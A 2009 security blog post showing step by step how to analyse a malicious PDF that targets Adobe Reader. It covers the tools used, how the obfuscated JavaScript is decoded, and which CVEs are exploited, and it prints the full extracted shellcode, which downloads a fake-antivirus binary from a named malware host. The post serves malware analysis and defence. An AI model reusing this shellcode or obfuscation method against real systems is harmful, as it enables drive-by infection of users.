Exploits: Analyzing a malicious PDF Document

December 21, 2009 | Jaime Blasco

In this post, I will explain a real case example of how to manually analyze a malicious PDF document.

Some days ago I collected a malicious PDF file, usually, Wepawet does an excellent job and automatically analyze the malicious file for you.

In this case, Wepawet said “No exploits were identified.” so probably the malicious PDF file uses some tricks against automatic analysis.

We start collecting some information of the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

Collect some PDF object information to begin the analysis using Didier Stevens pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php

PDFiD 0.0.9 pdf.php

 PDF Header: %PDF-1.4

 obj                    9

 endobj                 9

 stream                 3

 endstream              3

 xref                   1

 trailer                1

 startxref              1

 /Page                  1

 /Encrypt               0

 /ObjStm                0

 /JS                    1

 /JavaScript            2

 /AA                    0

 /OpenAction            0

 /AcroForm              0

 /JBIG2Decode           0

 /RichMedia             0

 /Colors > 2^24         0

Now we know there is some javascript and filter objects we should analyze, first we search for Filter objects inside the PDF using Didier Stevens pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php

obj 5 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



obj 6 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 299

   /Filter /FlateDecode



 >>

We have two streams that should be carefully analyzed, let’s see the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more

obj 5 0

 Type:

 Referencing:

 Contains stream



<< /Length 4852 /Filter /FlateDecode

 >>



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa

443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd

assa 443562df sdfs

23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df…......

...........

...........

...........

We have 172K of stream data, we save it for later analyze. Now dump the obj 6 raw data:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more

obj 6 0

 Type:

 Referencing:

 Contains stream



<< /Length 299 /Filter /FlateDecode

 >>



 <<

   /Length 299

   /Filter /FlateDecode



 >>

This is much better, we have some javascript eval, unescape functions and a reference to this.info.title.

If we inspect the info.title we realize it’s linked with the obj 5 0 data with extracted.

As we can see, the javascript code replace “colkokasd assa 443562df sdfs232342” from the obj 5 stream with the var uWReX84wKBTnU (”%”)

To emulate the javascript code, first we dump the obj5 data and then use sed to replace data:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5

sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5

We create a js file with the data replace inside var JmfNzd7NdGNhf = “%66%75%6e%63%74%69%6f%6…....... ” and then call print(unescape(JmfNzd7NdGNhf));.

If we execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js

Now we have the unobfuscated javascript code. The PPPDDDFF() version check for the Acrobat Reader version using the app.viewerVersion Adobe Javascript function and exploits a different vulnerability on each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

We also found a shellcode, here is the raw data extracted using SpiderMonkey:

shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \

                        "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \

                        "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \

                        "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \

                        "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \

                        "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \

                        "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \

                        "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \

                        "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \

                        "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \

                        "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \

                        "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \

                        "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \

                        "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \

                        "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX), here is the analysis data:

Jaime Blasco

About the Author: Jaime Blasco

Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AT&T Cybersecurity, Jaime leads the Alien Labs Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AT&T, Jaime was Chief Scientest at AlienVault. Prior to that, he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.

Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Get the latest security news in your inbox.

Subscribe via Email

Watch a Demo ›
Get Price Free Trial